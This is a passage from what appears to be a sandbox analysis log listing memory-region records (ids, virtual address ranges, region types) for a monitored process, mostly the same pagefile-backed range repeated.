= 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8444 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8445 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8446 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8447 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8448 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8449 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8450 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8451 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8452 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8453 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8454 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8455 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8456 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8457 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8458 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8459 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8460 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8461 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8462 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8463 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8464 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8465 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8466 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8467 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8468 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13813 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 13814 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 13815 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13816 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13817 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13818 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13819 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13820 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13821 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13822 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13823 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13824 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13825 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13826 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13827 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13828 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13829 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13830 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13831 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13832 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13833 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13834 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13835 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13836 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13837 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13838 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13839 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13840 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13841 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13842 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13843 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13844 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13845 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13846 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13889 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13890 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13891 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13892 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13893 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13894 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13895 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13896 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13897 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13898 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13899 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13900 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13901 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13902 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13903 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13904 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13905 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13906 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13907 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13908 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13909 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13910 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13911 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13912 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13913 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13914 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13915 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13916 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13917 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13918 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13919 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13920 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13921 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13922 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13923 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13924 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13925 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13926 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13927 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13928 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13929 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13930 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13974 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13975 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13976 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13977 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13978 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13979 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13980 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13981 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13982 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13983 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13984 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13985 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13986 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13987 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13988 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13989 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13990 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13991 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13992 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13993 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13994 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13995 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13996 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13997 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13998 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13999 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14000 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14001 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14002 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14003 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14004 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14005 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14006 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14007 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14008 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14009 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14010 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14011 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14012 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14013 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14014 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14015 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14016 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14017 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14018 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14019 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14020 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14021 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14022 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14023 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14024 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14025 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14026 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14027 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14028 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14042 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14043 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14044 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14045 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14046 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14047 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14048 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14049 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14050 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14051 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14052 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14053 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14054 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14055 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14056 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14057 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14058 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14059 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14060 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14061 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14062 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14063 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 